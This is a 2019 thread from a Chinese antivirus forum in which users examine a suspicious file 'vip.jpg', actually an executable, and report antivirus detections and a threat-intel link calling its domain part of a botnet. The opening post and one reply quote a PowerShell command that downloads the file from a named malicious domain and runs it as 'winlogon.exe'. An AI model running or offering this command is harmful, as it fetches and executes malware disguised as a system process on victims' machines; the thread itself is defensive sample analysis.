搜索
查看: 1302|回复: 18
收起左侧

[可疑文件] vip.jpg

[复制链接]
2512975065
发表于 2019-8-4 21:37:58 | 显示全部楼层 |阅读模式
本帖最后由 2512975065 于 2019-8-4 21:56 编辑

实际上是一个可执行文件,有区段(但看不出是exe还是什么)
https://c-t.work/s/9923a013b2aa47
一会儿更新VT
https://www.virustotal.com/gui/f ... 419c00dde/detection
欢迎访问病毒源:http://us.howappyoude.club/
(new-object System.Net.WebClient).DownloadFile( 'http://us.howappyoude.club/vip.jpg','C:\ProgramData\winlogon.exe')
Start-Process -FilePath C:\ProgramData\winlogon.exe
llcy
发表于 2019-8-4 21:43:00 | 显示全部楼层
本帖最后由 llcy 于 2019-8-4 21:46 编辑





本帖子中包含更多资源

您需要 登录 才可以下载或查看,没有帐号?快速注册

x
a233
发表于 2019-8-4 21:44:43 | 显示全部楼层
卡巴(设置了始终扫描加密链接)

本帖子中包含更多资源

您需要 登录 才可以下载或查看,没有帐号?快速注册

x
2512975065
 楼主| 发表于 2019-8-4 21:50:57 | 显示全部楼层
双击党快来
静影沉璧
发表于 2019-8-4 21:56:18 | 显示全部楼层
Microsoft


本帖子中包含更多资源

您需要 登录 才可以下载或查看,没有帐号?快速注册

x
ELOHIM
发表于 2019-8-4 22:02:52 | 显示全部楼层
edge阻止下载。
BE_HC
发表于 2019-8-4 22:43:01 | 显示全部楼层
本帖最后由 BE_HC 于 2019-8-4 22:44 编辑

微步情报
https://x.threatbook.cn/nodev4/vb4/article?threatInfoID=1751

域名隶属僵尸网络



本帖子中包含更多资源

您需要 登录 才可以下载或查看,没有帐号?快速注册

x
N卡网速快
发表于 2019-8-4 22:50:24 | 显示全部楼层
本帖最后由 N卡网速快 于 2019-8-4 22:53 编辑

下载直接杀,点进那个网站之后cpu一直100%,应该是挖矿?

本帖子中包含更多资源

您需要 登录 才可以下载或查看,没有帐号?快速注册

x
www-tekeze
发表于 2019-8-4 23:19:54 | 显示全部楼层
本帖最后由 www-tekeze 于 2019-8-5 00:21 编辑

火绒已做通杀,智量Heur杀!有空试下双击。。

补充:图片格式无法打开,改exe双击进程都没有,改js也运行不了。

本帖子中包含更多资源

您需要 登录 才可以下载或查看,没有帐号?快速注册

x
记录微笑
发表于 2019-8-4 23:32:06 | 显示全部楼层
Mcafee ENS 下载直接杀

访问网址:
  1. 该站点已被阻止。
  2. http://us.howappyoude.club/%2520(new-object%2520System.Net.WebClient).DownloadFile(%2520'http://us.howappyoude.club/vip.jpg','C:/ProgramData/winlogon.exe')%2520Start-Process%2520-FilePath%2520C:/ProgramData/winlogon.exe
  3. 此网站上存在无法接受的安全风险。
  4. McAfee 网页类别: 恶意站点
  5. McAfee 安全评级: 不安全

  6. Powered By: McAfee Endpoint Security
  7. McAfee Logo
复制代码
您需要登录后才可以回帖 登录 | 快速注册

本版积分规则

手机版|杀毒软件|软件论坛|卡饭乐购| 卡饭论坛

Copyright © KaFan  KaFan.cn All Rights Reserved.

Powered by Discuz! X3.4( 苏ICP备07004770号 ) GMT+8, 2019-11-15 05:03 , Processed in 0.091017 second(s), 18 queries .

快速回复 返回顶部 返回列表